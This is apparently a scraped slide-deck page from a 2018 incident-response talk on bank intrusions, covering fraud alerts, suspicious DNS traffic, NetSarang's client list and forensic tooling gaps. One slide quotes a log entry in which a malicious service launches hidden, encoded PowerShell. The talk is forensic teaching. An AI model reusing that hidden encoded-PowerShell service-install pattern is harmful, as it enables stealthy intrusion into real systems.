Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Sergey Golovanov - Indecent Response 2018

February 10, 2018

Sergey Golovanov - Indecent Response 2018


February 10, 2018

More Decks by DC7499

Other Decks in Education


  1. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…
  2. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
  3. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA
  4. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!
  5. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.